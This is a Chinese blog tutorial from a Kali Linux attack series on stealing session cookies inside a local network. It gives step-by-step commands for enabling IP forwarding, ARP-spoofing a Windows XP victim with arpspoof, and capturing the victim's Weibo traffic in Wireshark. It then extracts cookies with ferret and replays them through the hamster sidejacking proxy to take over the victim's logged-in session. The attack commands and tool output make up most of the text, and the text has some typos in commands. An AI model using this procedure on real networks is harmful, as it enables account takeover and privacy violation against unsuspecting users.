[置顶] kali攻防第3章 内网称霸之Cookie截取

内网称霸之Cookie截取

 

准备工具

 

1、一台KALI_LINUX系统

2、一台被攻击的windows系统

 

网络环境

 

Kali系统IP  10.10.10.131

Windows xp IP 10.10.10.129

 

使用的工具

 

arpspoof   -->欺骗工具 

 

wireshark -->抓包工具  

 

 

开始执行步骤

 

1、root@kali:~# echo "1" > /proc/sys/net/ipv4/ip_forward

2、arpspoof -i eth0 -t 10.10.10.2 10.10.10.129

3、使用wireshark进行抓包

 [置顶] kali攻防第3章 内网称霸之Cookie截取_第1张图片

 

 

4、受害者10.10.10.129打开微博

 [置顶] kali攻防第3章 内网称霸之Cookie截取_第2张图片

5、停止抓包工具并保存抓包数据为pcap格式,保存名字为cookie

 [置顶] kali攻防第3章 内网称霸之Cookie截取_第3张图片

 

6、使用 ferret工具

如果没有这个工具请使用命令

ferret没有64位的

可以安装32位的

1)添加对32位的支持

dpkg --add-architecture i386

2)更新

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

3)安装ferret

sudo aptitude install ferret-sidejack:i386

 

4)ferrer -r cookie.pacp

 

 

7、生成hamster.txt文件,进行架设代理服务器

root@kali:~# hamster 

--- HAMPSTER 2.0 side-jacking tool ---

Set browser to use proxy http://127.0.0.1:1234

DEBUG: set_ports_option(1234)

DEBUG: mg_open_listening_port(1234)

Proxy: listening on 127.0.0.1:1234

begining thread

 

8、打开10.10.10.131系统中的游览器,设置代理服务地址和端口并关闭arp欺骗

 [置顶] kali攻防第3章 内网称霸之Cookie截取_第4张图片

 

 

 

9、分析hamster信息一条一条进行

 [置顶] kali攻防第3章 内网称霸之Cookie截取_第5张图片[置顶] kali攻防第3章 内网称霸之Cookie截取_第6张图片

 


你可能感兴趣的:([置顶] kali攻防第3章 内网称霸之Cookie截取)